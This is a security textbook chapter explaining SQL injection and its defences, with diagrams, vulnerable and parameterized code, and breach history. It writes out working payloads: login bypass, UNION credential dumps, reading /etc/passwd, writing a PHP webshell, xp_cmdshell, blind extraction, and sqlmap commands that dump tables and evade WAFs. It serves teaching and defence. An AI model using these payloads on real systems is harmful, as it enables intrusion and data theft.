Chapter 19: Injection Attacks -- When User Input Becomes Code
"All input is evil until proven otherwise." -- Michael Howard, Writing Secure Code
Injection has appeared in every edition of the OWASP Top 10 since the first one in 2003. In the 2021 edition it was still there, with the "Injection" category broadened to cover all the flavors, cross-site scripting included. It is the cockroach of vulnerabilities. A single misplaced quote mark can bring down a company. This chapter shows you why.
The Anatomy of Injection
Injection attacks occur whenever untrusted data is sent to an interpreter as part of a command or query. The interpreter cannot distinguish between the intended code and the attacker's payload. This is not a bug in a specific language or framework -- it is a category of architectural failure.
Injection is fundamentally a **trust boundary violation**. Whenever data crosses from an untrusted zone (user input, external API, file upload) into an interpreter (SQL engine, OS shell, HTML renderer, LDAP directory), the boundary must enforce that data remains data and never becomes executable instructions.
The security literature has a closely related idea, the **confused deputy problem**: the interpreter (the deputy) is tricked into treating data as instructions because it has no way to distinguish between the two once they are concatenated together.
The three conditions for injection:
- Untrusted input -- data the application does not fully control
- String concatenation or interpolation -- mixing data with code in the same channel
- An interpreter -- something that parses and executes the mixed result
Remove any one of these three, and injection becomes impossible.
graph TD
A[Untrusted Input] --> D{String Concatenation?}
B[Application Code / Template] --> D
D -->|Yes| E[Mixed String Sent to Interpreter]
D -->|No - Parameterized| F[Data Sent Separately from Code]
E --> G[Interpreter Cannot Distinguish Data from Code]
G --> H[INJECTION POSSIBLE]
F --> I[Interpreter Treats Data as Data Only]
I --> J[INJECTION IMPOSSIBLE]
style H fill:#ff6b6b,stroke:#c0392b,color:#fff
style J fill:#2ecc71,stroke:#27ae60,color:#fff
SQL Injection: The Granddaddy of Them All
Classic (In-Band) SQL Injection
Consider a login form that builds its query by concatenating user input directly into SQL:
# VULNERABLE CODE -- DO NOT USE
username = request.form['username']
password = request.form['password']
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
What does the attacker type? Suppose they enter this as the username:
' OR '1'='1' --
The resulting query becomes:
SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = ''
The `--` comments out the rest of the query. `'1'='1'` is always true. The database returns every user. The application typically logs in as the first user -- often the admin.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database Engine
Attacker->>WebApp: POST /login<br/>username: ' OR '1'='1' --<br/>password: anything
WebApp->>WebApp: Concatenate input into SQL string
Note over WebApp: query = "SELECT * FROM users<br/>WHERE username = '' OR '1'='1' --<br/>AND password = 'anything'"
WebApp->>DB: Execute concatenated query
DB->>DB: Parse query -- OR condition always true
DB->>DB: -- comments out password check
DB-->>WebApp: Returns ALL rows from users table
WebApp-->>Attacker: Login successful (as first user, typically admin)
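The bypass can be reproduced safely against an in-memory database. The following is a minimal sketch, assuming SQLite (via Python's standard `sqlite3` module) as a stand-in for the production database; the table layout, sample rows, and the `vulnerable_login` helper are hypothetical.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory users table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Build the query by string interpolation, as the vulnerable form does."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return query, conn.execute(query).fetchall()


conn = make_db()
query, rows = vulnerable_login(conn, "' OR '1'='1' --", "anything")
print(query)  # the password check now sits behind the comment marker
print(rows)   # every row in the table comes back
```

A wrong password for a real user still fails, which is why this class of bug often survives casual testing: only input containing SQL syntax exposes it.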
How the SQL Parser Sees It
Understanding why injection works requires understanding how a SQL parser operates. When the database receives a query string, it performs lexical analysis -- breaking the string into tokens. Here is how the parser tokenizes the injected query:
Token 1: SELECT (keyword)
Token 2: * (wildcard)
Token 3: FROM (keyword)
Token 4: users (identifier)
Token 5: WHERE (keyword)
Token 6: username (identifier)
Token 7: = (operator)
Token 8: '' (string literal -- empty)
Token 9: OR (keyword -- INJECTED)
Token 10: '1' (string literal -- INJECTED)
Token 11: = (operator -- INJECTED)
Token 12: '1' (string literal -- INJECTED, comparison is always true)
Token 13: -- (comment -- INJECTED, kills rest of query)
The parser has no way to know that tokens 9 through 13 were not intended by the developer. They are syntactically valid SQL. The attacker has changed the structure of the query -- replacing the intended AND condition with an always-true OR condition -- by injecting SQL syntax through a data channel.
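To make the lexing step concrete, here is a toy tokenizer. It is a deliberately simplified sketch, not how any real database lexes SQL: it recognizes only the handful of token kinds this one query uses, and the names `TOKEN_RE`, `KEYWORDS`, and `tokenize` are made up for the illustration.

```python
import re

# Toy lexer for illustration only; real SQL lexers handle far more cases.
TOKEN_RE = re.compile(
    r"""
    (?P<comment>--.*)          # line comment: swallows the rest of the input
  | (?P<string>'[^']*')        # single-quoted string literal
  | (?P<word>[A-Za-z_]\w*)     # keyword or identifier
  | (?P<op>[=*])               # the only operators this query uses
    """,
    re.VERBOSE,
)

KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR"}


def tokenize(sql):
    """Return (kind, text) pairs; whitespace between tokens is skipped."""
    tokens = []
    for match in TOKEN_RE.finditer(sql):
        kind, text = match.lastgroup, match.group()
        if kind == "word":
            kind = "keyword" if text.upper() in KEYWORDS else "identifier"
        tokens.append((kind, text))
    return tokens


injected = (
    "SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = ''"
)
tokens = tokenize(injected)
for number, (kind, text) in enumerate(tokens, start=1):
    print(f"Token {number}: {text}  ({kind})")
```

The point to notice in the output is what is missing: the developer's `AND password = ...` check never appears as keyword and identifier tokens, because it has been absorbed into the trailing comment.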
UNION-Based SQL Injection
When the application displays query results, attackers use UNION SELECT to append results from other tables. The key requirement: the number of columns in the UNION must match the original query.
Step 1 -- Determine column count using ORDER BY:
' ORDER BY 1 -- (works -- query returns at least 1 column)
' ORDER BY 2 -- (works -- at least 2 columns)
' ORDER BY 3 -- (works -- at least 3 columns)
' ORDER BY 4 -- (error -- query returns exactly 3 columns)
Step 2 -- Confirm column count with NULL UNION:
' UNION SELECT NULL, NULL, NULL -- (works -- 3 columns confirmed)
Step 3 -- Find columns that display string data:
' UNION SELECT 'test1', NULL, NULL -- (check if column 1 shows strings)
' UNION SELECT NULL, 'test2', NULL -- (check if column 2 shows strings)
' UNION SELECT NULL, NULL, 'test3' -- (check if column 3 shows strings)
Step 4 -- Extract database metadata:
-- List all tables in the database
' UNION SELECT table_name, NULL, NULL FROM information_schema.tables --
-- List columns for a specific table
' UNION SELECT column_name, data_type, NULL FROM information_schema.columns
WHERE table_name = 'users' --
-- Extract actual data
' UNION SELECT username, password, email FROM users --
Step 5 -- Escalate to database-level compromise:
-- Read files from the filesystem (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd'), NULL, NULL --
-- Write a webshell (MySQL with FILE privilege)
' UNION SELECT '<?php system($_GET["cmd"]); ?>', NULL, NULL
INTO OUTFILE '/var/www/html/shell.php' --
-- Execute OS commands (MSSQL xp_cmdshell)
'; EXEC xp_cmdshell 'whoami' --
-- Extract database version (fingerprinting)
' UNION SELECT version(), NULL, NULL -- -- MySQL/PostgreSQL
' UNION SELECT @@version, NULL, NULL -- -- MSSQL
' UNION SELECT banner, NULL, NULL FROM v$version -- -- Oracle
graph TD
A[Find Injection Point] --> B[Determine Column Count<br/>ORDER BY N]
B --> C[Confirm with UNION SELECT NULL...]
C --> D[Identify String-Displayable Columns]
D --> E[Extract Database Metadata<br/>information_schema.tables]
E --> F[Extract Column Names<br/>information_schema.columns]
F --> G[Dump Table Data<br/>UNION SELECT col1, col2 FROM target]
G --> H{Database Privileges?}
H -->|FILE privilege| I[Read/Write Server Files<br/>LOAD_FILE, INTO OUTFILE]
H -->|xp_cmdshell MSSQL| J[Execute OS Commands]
H -->|DBA privileges| K[Full Database Compromise]
I --> L[Webshell Upload → RCE]
J --> L
style L fill:#ff6b6b,stroke:#c0392b,color:#fff
Through UNION injection, an attacker can map the entire database schema just through a single vulnerable input field. Every table, every column, every row. The information_schema is a gold mine. And depending on database permissions, they can read files, write files, or even execute operating system commands. A SQL injection can escalate from "read some data" to "full server compromise" in a single session.
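The column-count probe and the data dump can be walked through against a local database. This is a sketch under stated assumptions: SQLite stands in for the target, so `sqlite_master` plays the role that `information_schema.tables` plays on MySQL or PostgreSQL, and the schema and the `vulnerable_search` endpoint are hypothetical.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE products (name TEXT, category TEXT, price TEXT);
    CREATE TABLE users (username TEXT, password TEXT, email TEXT);
    INSERT INTO products VALUES ('Widget', 'tools', '9.99');
    INSERT INTO users VALUES ('admin', 'hash-placeholder', 'admin@example.com');
    """
)


def vulnerable_search(category):
    """Hypothetical search endpoint that concatenates input and shows all rows."""
    query = (
        "SELECT name, category, price FROM products "
        f"WHERE category = '{category}'"
    )
    return conn.execute(query).fetchall()


def probe_column_count(max_cols=6):
    """Try UNION SELECT with 1..max_cols NULLs until the database accepts one."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + " --"
        try:
            vulnerable_search(payload)
            return n
        except sqlite3.OperationalError:
            continue  # column counts did not match; try one more NULL
    return None


column_count = probe_column_count()
tables = vulnerable_search(
    "' UNION SELECT name, NULL, NULL FROM sqlite_master WHERE type='table' --"
)
dumped = vulnerable_search("' UNION SELECT username, password, email FROM users --")
print(column_count, tables, dumped)
```

Nothing here requires more than the ability to submit a search term and read the results page, which is the whole danger of the technique.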
Blind SQL Injection
Sometimes the application does not display query results -- it only shows "login successful" or "login failed." The attacker cannot see the data directly, but they can still extract it one bit at a time.
Boolean-Based Blind SQLi:
The attacker asks the database yes/no questions by observing the application's behavior:
-- Is the first character of the admin's password 'a'?
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin') = 'a' --
-- If the page shows "login successful" → first character is 'a'
-- If the page shows "login failed" → first character is NOT 'a'
-- Repeat for 'b', 'c', 'd', ... then move to character position 2, 3, ...
A more efficient approach uses binary search with ASCII values:
-- Is the ASCII value of the first character greater than 'm' (109)?
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 109 --
-- If true: character is between 'n' (110) and '~' (126) -- next, test the midpoint of that range
-- If false: character is between ' ' (32) and 'm' (109) -- next, test the midpoint of that range
-- Binary search: extract each character in ~7 requests instead of ~95
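The binary search can be simulated end to end. The sketch below assumes SQLite as the backend (its `unicode()` and `substr()` functions stand in for `ASCII()` and `SUBSTRING()`), a hypothetical `login_succeeds` oracle that reveals only true or false, and a password whose length the attacker already knows.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")

requests_made = 0


def login_succeeds(username_field):
    """Stand-in for the vulnerable page: the attacker sees only True or False."""
    global requests_made
    requests_made += 1
    query = f"SELECT 1 FROM users WHERE username = '{username_field}'"
    return conn.execute(query).fetchone() is not None


def extract_char(position):
    """Binary-search the printable ASCII range (32..126) for one character."""
    low, high = 32, 126
    while low < high:
        mid = (low + high) // 2
        payload = f"admin' AND unicode(substr(password, {position}, 1)) > {mid} --"
        if login_succeeds(payload):
            low = mid + 1   # the character code is above mid
        else:
            high = mid      # the character code is mid or below
    return chr(low)


PASSWORD_LENGTH = 6  # assumed known; it could be probed with length(password) > n
recovered = "".join(extract_char(i) for i in range(1, PASSWORD_LENGTH + 1))
print(recovered, requests_made)
```

Each character costs at most seven yes/no questions, since seven halvings are enough to narrow 95 candidates down to one.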
Time-Based Blind SQLi:
When even boolean responses are not distinguishable -- the page looks identical regardless of query result -- the attacker uses time delays:
-- MySQL
' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
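-- PostgreSQL (stacked query: pg_sleep() returns void, so it cannot be used directly as an AND condition)
'; SELECT CASE WHEN SUBSTRING(password,1,1)='a'
THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='admin' --
-- MSSQL (stacked query: IF is a statement, not an expression)
'; IF (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' WAITFOR DELAY '0:0:5' --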
If the response takes 5 seconds, the character matches. If it returns immediately, it does not.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
Note over Attacker: Extracting admin password, char by char
Attacker->>WebApp: ' AND IF(SUBSTR(pw,1,1)='a', SLEEP(5), 0) --
WebApp->>DB: Execute query
DB-->>WebApp: Instant response (0.02s)
WebApp-->>Attacker: Response in 0.02s → char 1 ≠ 'a'
Attacker->>WebApp: ' AND IF(SUBSTR(pw,1,1)='s', SLEEP(5), 0) --
WebApp->>DB: Execute query
Note over DB: SLEEP(5) triggered
DB-->>WebApp: Response after 5.01s
WebApp-->>Attacker: Response in 5.01s → char 1 = 's'
Note over Attacker: Move to character 2...<br/>Repeat for entire password hash<br/>32-char hash = ~224 requests (binary search)<br/>Automated by sqlmap
This is slow -- extracting a 32-character hash takes hundreds of requests -- but sqlmap automates it completely.
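The timing channel can be sketched the same way. SQLite has no built-in sleep, so this example registers a hypothetical `sleep()` SQL function purely to imitate `SLEEP()` or `pg_sleep()`; the delay is shortened to 0.3 seconds and the `response_time` helper stands in for measuring an HTTP round trip.

```python
import sqlite3
import time

DELAY = 0.3  # seconds; shortened from the 5 seconds a real attack might use

conn = sqlite3.connect(":memory:")
# Assumption: a user-defined sleep() imitates the database's own delay function.
conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")


def response_time(username_field):
    """Run the vulnerable query and report only how long it took."""
    start = time.perf_counter()
    query = f"SELECT 1 FROM users WHERE username = '{username_field}'"
    conn.execute(query).fetchall()
    return time.perf_counter() - start


def char_matches(position, guess):
    """True if the response was slow enough to mean the guess was right."""
    payload = (
        f"admin' AND CASE WHEN substr(password, {position}, 1) = '{guess}' "
        f"THEN sleep({DELAY}) ELSE 0 END --"
    )
    return response_time(payload) > DELAY / 2


print(char_matches(1, "a"))  # fast response: first character is not 'a'
print(char_matches(1, "s"))  # delayed response: first character is 's'
```

The query returns no rows either way, so the page content is identical in both cases. Only the clock distinguishes them, which is why network jitter forces real tools to use longer delays and repeated measurements.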
Set up a deliberately vulnerable application using DVWA (Damn Vulnerable Web Application) or WebGoat. Try these injection techniques against a controlled target. Use `sqlmap` to automate blind injection:
~~~bash
# Install sqlmap
pip install sqlmap
# Detect injection point and enumerate databases
sqlmap -u "http://localhost:8080/vulnerable?id=1" --dbs --batch
# List tables in a specific database
sqlmap -u "http://localhost:8080/vulnerable?id=1" -D testdb --tables --batch
# Dump a specific table
sqlmap -u "http://localhost:8080/vulnerable?id=1" -D testdb -T users --dump --batch
# Test POST parameters
sqlmap -u "http://localhost:8080/login" \
--data="username=test&password=test" \
--batch --level=3 --risk=2
# Test with authenticated session
sqlmap -u "http://localhost:8080/api/data?id=1" \
--cookie="session=abc123" --batch
# Use tamper scripts to bypass WAFs
sqlmap -u "http://localhost:8080/vulnerable?id=1" \
--tamper=space2comment,between,randomcase --batch
# Verbose output to see every request sqlmap makes
sqlmap -u "http://localhost:8080/vulnerable?id=1" -v 3 --batch
~~~
Observe how sqlmap determines the injection point, identifies the database type, selects the optimal extraction technique, and extracts data through hundreds of automated requests.
**CRITICAL:** Only use sqlmap against systems you own or have explicit written authorization to test. Unauthorized testing is illegal under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent laws in most countries.
Second-Order SQL Injection
Second-order injection is particularly nasty because it evades most surface-level testing. The malicious payload is stored safely in the database during one operation, then detonates later when a different operation retrieves it and concatenates it into a query.
Step 1 -- Registration (safe storage):
A user registers with username: admin'--
The registration query uses parameterized queries (safe):
INSERT INTO users (username, email) VALUES ($1, $2)
-- Stores the literal string admin'-- in the database
The literal string admin'-- is stored correctly. No injection during registration.
Step 2 -- Password change (vulnerable retrieval):
# Developer assumes database values are "trusted"
username = get_current_user_from_session() # Returns "admin'--" from DB
# VULNERABLE -- concatenates "trusted" database value into SQL
query = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"
The query becomes:
UPDATE users SET password = 'newpass123' WHERE username = 'admin'--'
This changes the real admin's password, not the attacker's account.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
Note over Attacker: Phase 1: Plant the payload
Attacker->>WebApp: Register as username: admin'--
WebApp->>DB: INSERT INTO users (username) VALUES ($1)<br/>Parameterized -- safe
DB-->>WebApp: OK -- stored "admin'--" literally
WebApp-->>Attacker: Registration successful
Note over Attacker: Phase 2: Trigger the payload
Attacker->>WebApp: Change password to "hacked123"
WebApp->>DB: SELECT username FROM sessions WHERE...<br/>Returns "admin'--"
WebApp->>WebApp: Build query by concatenation:<br/>UPDATE users SET password='hacked123'<br/>WHERE username='admin'--'
WebApp->>DB: Execute concatenated query
Note over DB: -- comments out trailing quote<br/>WHERE username='admin'<br/>Updates REAL admin's password!
DB-->>WebApp: 1 row updated
WebApp-->>Attacker: Password changed
Note over Attacker: Phase 3: Profit
Attacker->>WebApp: Login as admin / hacked123
WebApp-->>Attacker: Welcome, administrator!
The lesson: all data is untrusted, even data from your own database. Parameterize every query, not just the ones that touch user input directly.
In 2015, a healthcare startup had perfect parameterized queries on all their web forms. Gold star. But their nightly reporting job pulled patient names from the database and concatenated them into dynamic SQL for generating PDF reports. A researcher registered a patient named `Robert'; DROP TABLE appointments;--` and the next morning, every appointment in the system was gone. The backup restoration process? Also generated by a SQL query that concatenated table names. They lost three months of scheduling data.
The root cause was a common misconception: "data in my own database is trustworthy." It is not. Data in your database arrived from *somewhere* -- user input, API calls, file imports, partner feeds. Every time that data is used in a query, it must be parameterized, regardless of its origin.
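The registration and password-change scenario can be replayed in a few lines. This is a minimal sketch assuming SQLite and a hypothetical two-column `users` table; the function names are invented, and passwords are stored in plain text only to keep the demonstration short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'original-admin-pw')")


def register(username, password):
    """Safe: parameterized insert stores the payload as a literal string."""
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)", (username, password)
    )


def change_password_vulnerable(stored_username, new_password):
    """Vulnerable: trusts a value just because it came from the database."""
    conn.execute(
        f"UPDATE users SET password = '{new_password}' "
        f"WHERE username = '{stored_username}'"
    )


def change_password_safe(stored_username, new_password):
    """Safe: the stored value is bound as data, whatever it contains."""
    conn.execute(
        "UPDATE users SET password = ? WHERE username = ?",
        (new_password, stored_username),
    )


def password_of(username):
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


register("admin'--", "attacker-pw")
stored = conn.execute(
    "SELECT username FROM users WHERE password = 'attacker-pw'"
).fetchone()[0]

change_password_safe(stored, "safe-change")
after_safe = (password_of("admin"), password_of("admin'--"))

change_password_vulnerable(stored, "hacked123")
after_vulnerable = (password_of("admin"), password_of("admin'--"))
print(after_safe, after_vulnerable)
```

The same stored value is harmless in one function and destructive in the other. The difference lies entirely in how the query is built, not in where the data came from.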
Real-World SQL Injection Breaches
This is not academic. SQL injection has been the primary attack vector in some of the largest data breaches in history:
- Heartland Payment Systems (2008): SQL injection led to the theft of 130 million credit card numbers. Estimated cost: $140 million. The attacker, Albert Gonzalez, was sentenced to 20 years in prison.
- Sony PlayStation Network (2011): SQL injection was widely reported as the initial attack vector. 77 million accounts compromised. PSN was offline for 23 days. Sony estimated the breach cost $171 million.
- TalkTalk (2015): A 17-year-old used SQL injection to steal personal data of 157,000 customers. The company was fined £400,000 by the ICO and lost 100,000 subscribers.
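- Equifax (2017): The entry point was an Apache Struts flaw (CVE-2017-5638), itself an injection bug in which attacker-controlled header content was evaluated as an OGNL expression. Once inside, the attackers queried internal databases and extracted 147 million records including Social Security numbers.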
- Accellion FTA (2021): SQL injection in a legacy file transfer appliance led to breaches at dozens of organizations including Shell, Kroger, Morgan Stanley, and the Reserve Bank of New Zealand.
The Real Fix: Parameterized Queries
Why Escaping Fails
Escaping attempts to neutralize dangerous characters by adding backslashes or doubling quotes. It fails because:
- Character set issues: Multi-byte character encodings like GBK can produce a valid quote after escaping. The `addslashes()` function in PHP was famously vulnerable to this. The attacker sends the bytes `0xbf27`; `addslashes()` inserts a backslash before the single quote, producing `0xbf5c27`. In GBK, `0xbf5c` is a single valid multi-byte character, so the `0xbf` consumes the backslash and leaves the quote (`0x27`) un-escaped.
- Context sensitivity: Different parts of a SQL query require different escaping rules:
  - String literals: escape single quotes
  - Numeric values: no quotes at all (escaping is irrelevant)
  - Identifiers (table/column names): use backticks (MySQL) or double quotes (PostgreSQL)
  - LIKE clauses: escape `%` and `_` in addition to quotes
  - ORDER BY: cannot be parameterized in most databases -- requires allowlist validation
- Human error: Developers forget to escape one input out of hundreds. One miss is all an attacker needs.
- Second-order attacks: Escaping happens at input time, not at query construction time. Data stored safely can be dangerous when retrieved and concatenated later.
- Database-specific syntax: Each database has unique escaping requirements. What works for MySQL may not work for PostgreSQL, MSSQL, or Oracle. Escaping assumes knowledge of the exact database and version.
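The character-set failure is easy to see at the byte level. The sketch below uses a hypothetical Python imitation of PHP's `addslashes()` (it is not the PHP implementation) and Python's built-in `gbk` codec to show what a GBK-aware database would see after escaping.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-level imitation of PHP's addslashes(), written for this demo only."""
    out = bytearray()
    for byte in raw:
        if byte == 0x00:
            out += b"\\0"          # NUL becomes backslash followed by '0'
            continue
        if byte in (0x27, 0x22, 0x5C):
            out.append(0x5C)       # prefix ', ", and \ with a backslash
        out.append(byte)
    return bytes(out)


# 0xbf is a GBK lead byte; 0x27 is the single quote the attacker wants to keep.
attacker_input = b"\xbf\x27 OR 1=1 -- "
escaped = addslashes(attacker_input)

# The escaping function works on single bytes and sees a quote to neutralize...
print(escaped[:3].hex())           # bf5c27

# ...but a GBK-aware parser reads 0xbf 0x5c as ONE character and keeps the quote.
decoded = escaped.decode("gbk")
print(repr(decoded))
```

After decoding, the backslash is gone: it became the second byte of a multi-byte character, and the quote that follows is live SQL syntax again.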
How Parameterized Queries Work at the Protocol Level
Parameterized queries separate the SQL structure from the data at the protocol level. The database engine receives the query template and the data values through different channels. The data cannot alter the query structure because the query is already compiled before the data arrives.
Under the hood, parameterized queries use a two-phase protocol. In PostgreSQL's extended query protocol:
**Phase 1 -- Parse:**
The client sends a Parse message containing:
SELECT * FROM users WHERE username = $1 AND password = $2
The server parses and analyzes this into a prepared statement. Its structure is **fixed** -- it contains two placeholder nodes where data values will be inserted. The parser has already determined the query structure: a SELECT with two equality conditions joined by AND.
**Phase 2 -- Bind:**
The client sends a Bind message containing the parameter values:
$1 = "admin" $2 = "pass123"
The server inserts these values into the pre-compiled plan as **data values**, not as SQL syntax. The values are never parsed as SQL.
Even if $1 contains `' OR '1'='1' --`, the execution plan does not change. The database compares the username column against the literal string `' OR '1'='1' --` and finds no match. The attack payload is treated as data -- exactly as intended.
This is the fundamental difference from string concatenation: with parameterization, the query structure is determined **before** the data is seen. No amount of creative input can alter the structure.
graph LR
subgraph "String Concatenation (VULNERABLE)"
A1[SQL Template] --> C1[Concatenate]
B1[User Input] --> C1
C1 --> D1[Single String]
D1 --> E1[Parser]
E1 --> F1[Execution Plan]
style D1 fill:#ff6b6b,stroke:#c0392b,color:#fff
end
subgraph "Parameterized Query (SAFE)"
A2[SQL Template] --> E2[Parser]
E2 --> F2[Fixed Execution Plan]
B2[User Input] --> G2[Bind Values]
G2 --> F2
style F2 fill:#2ecc71,stroke:#27ae60,color:#fff
end
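The effect can be observed directly. This sketch uses Python's `sqlite3` module, which prepares the statement and binds values through SQLite's in-process API; the PostgreSQL wire messages described above are not involved, but the separation of structure from data is the same idea. The schema is hypothetical.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

payload = "' OR '1'='1' --"

# The SQL text contains only placeholders; the payload travels as a bound value.
rows = conn.execute(
    "SELECT username FROM users WHERE username = ? AND password = ?",
    (payload, "anything"),
).fetchall()
print(rows)  # no user is literally named "' OR '1'='1' --"

# The same payload can even be stored and looked up as an ordinary string.
conn.execute("INSERT INTO users VALUES (?, ?)", (payload, "x"))
found = conn.execute(
    "SELECT username FROM users WHERE username = ?", (payload,)
).fetchone()
print(found)
```

The quote characters in the payload never reach a SQL parser, so there is nothing for them to break out of.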
Parameterized Query Examples Across Languages
Python (psycopg2 -- PostgreSQL):
cursor.execute(
"SELECT * FROM users WHERE username = %s AND password = %s",
(username, hashed_password)
)
Python (SQLAlchemy -- any database):
from sqlalchemy import text
result = session.execute(
text("SELECT * FROM users WHERE username = :user AND password = :pw"),
{"user": username, "pw": hashed_password}
)
Java (PreparedStatement):
PreparedStatement stmt = conn.prepareStatement(
"SELECT * FROM users WHERE username = ? AND password = ?"
);
stmt.setString(1, username);
stmt.setString(2, hashedPassword);
ResultSet rs = stmt.executeQuery();
Node.js (pg -- PostgreSQL):
const result = await pool.query(
'SELECT * FROM users WHERE username = $1 AND password = $2',
[username, hashedPassword]
);
Go (database/sql):
row := db.QueryRow(
"SELECT * FROM users WHERE username = $1 AND password = $2",
username, hashedPassword,
)
Ruby (ActiveRecord):
User.where("username = ? AND password = ?", username, hashed_password)
C# (SqlCommand):
var cmd = new SqlCommand(
"SELECT * FROM users WHERE username = @user AND password = @pw", conn
);
cmd.Parameters.AddWithValue("@user", username);
cmd.Parameters.AddWithValue("@pw", hashedPassword);
ORM Safety and Pitfalls
ORMs like SQLAlchemy, Django ORM, ActiveRecord, and Hibernate use parameterized queries by default:
# Django -- safe by default
User.objects.filter(username=username, password=hashed_password)
# SQLAlchemy -- safe by default
session.query(User).filter(User.username == username).first()
But ORMs also provide raw query escape hatches that reintroduce injection risk:
# Django -- VULNERABLE if you use raw() with f-strings
User.objects.raw(f"SELECT * FROM users WHERE username = '{username}'")
# Django -- safe raw query with parameters
User.objects.raw("SELECT * FROM users WHERE username = %s", [username])
# Django -- VULNERABLE extra() with string formatting
User.objects.extra(where=[f"username = '{username}'"])
# SQLAlchemy -- VULNERABLE text() with f-strings
session.execute(text(f"SELECT * FROM users WHERE name = '{name}'"))
# SQLAlchemy -- safe text() with bound parameters
session.execute(text("SELECT * FROM users WHERE name = :name"), {"name": name})
The ORM protects you unless you go out of your way to bypass it. And developers bypass it more often than you would think -- for "performance" or "complex queries." Every raw SQL string in a codebase is a potential injection point. Consider adding a pre-commit hook that greps for `f"SELECT`, `.raw(f"`, and `.extra(where=` and blocks the commit. Flag them all in code review.
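A scanner for those patterns might look like the following. It is a rough sketch rather than a complete linter: the regular expressions, the labels, and the `find_risky_sql` and `main` names are all assumptions, it will miss multi-line strings and `.format()` calls, and how `main` gets wired into a hook depends on your tooling.

```python
import re

# Line-based heuristics; deliberately crude, tuned to the patterns named above.
RISKY_PATTERNS = [
    (
        re.compile(r"""\bf["']{1,3}\s*(?:SELECT|INSERT|UPDATE|DELETE)\b""", re.IGNORECASE),
        "f-string containing SQL",
    ),
    (re.compile(r"""\.raw\(\s*f["']"""), "raw() called with an f-string"),
    (re.compile(r"""\.extra\(\s*where\s*="""), "extra(where=...)"),
]


def find_risky_sql(source):
    """Return (line_number, label) for every suspicious line in source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, label in RISKY_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


def main(paths):
    """Scan files and return 1 if anything was flagged (non-zero blocks a commit)."""
    exit_code = 0
    for path in paths:
        with open(path, encoding="utf-8") as handle:
            for lineno, label in find_risky_sql(handle.read()):
                print(f"{path}:{lineno}: {label}")
                exit_code = 1
    return exit_code


sample = '''\
User.objects.raw(f"SELECT * FROM users WHERE username = '{username}'")
User.objects.raw("SELECT * FROM users WHERE username = %s", [username])
User.objects.extra(where=[f"username = '{username}'"])
session.execute(text(f"SELECT * FROM users WHERE name = '{name}'"))
'''
findings = find_risky_sql(sample)
print(findings)
```

A check like this produces false positives and false negatives, so it works best as a prompt for human review rather than as proof that a codebase is clean.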
The Limits of Parameterization
Parameterized queries cannot be used everywhere. Table names, column names, and ORDER BY clauses cannot be parameterized in most databases:
# CANNOT parameterize table names
# This will NOT work:
cursor.execute("SELECT * FROM %s WHERE id = %s", (table_name, id))
# Solution: allowlist validation
ALLOWED_TABLES = {'users', 'orders', 'products'}
if table_name not in ALLOWED_TABLES:
    raise ValueError(f"Invalid table: {table_name}")
cursor.execute(f"SELECT * FROM {table_name} WHERE id = %s", (id,))
# CANNOT parameterize ORDER BY
# Solution: allowlist validation
ALLOWED_SORT_COLUMNS = {'name', 'created_at', 'price'}
ALLOWED_DIRECTIONS = {'ASC', 'DESC'}
if sort_col not in ALLOWED_SORT_COLUMNS or sort_dir not in ALLOWED_DIRECTIONS:
    raise ValueError("Invalid sort parameters")
cursor.execute(
    f"SELECT * FROM products WHERE category = %s ORDER BY {sort_col} {sort_dir}",
    (category,)
)
Defense in Depth for SQL Injection
Parameterized queries are the primary defense, but apply these additional layers:
- Least privilege database accounts: The application's database user should never have `DROP TABLE`, `GRANT`, `FILE`, or `SUPER` permissions. Use separate accounts for read and write operations. The application account should only have `SELECT`, `INSERT`, `UPDATE`, `DELETE` on specific tables.
- Input validation: Validate that an email looks like an email, an ID is numeric, a name matches expected patterns. This catches bugs, reduces attack surface, and provides defense against the rare cases where parameterization is not possible.
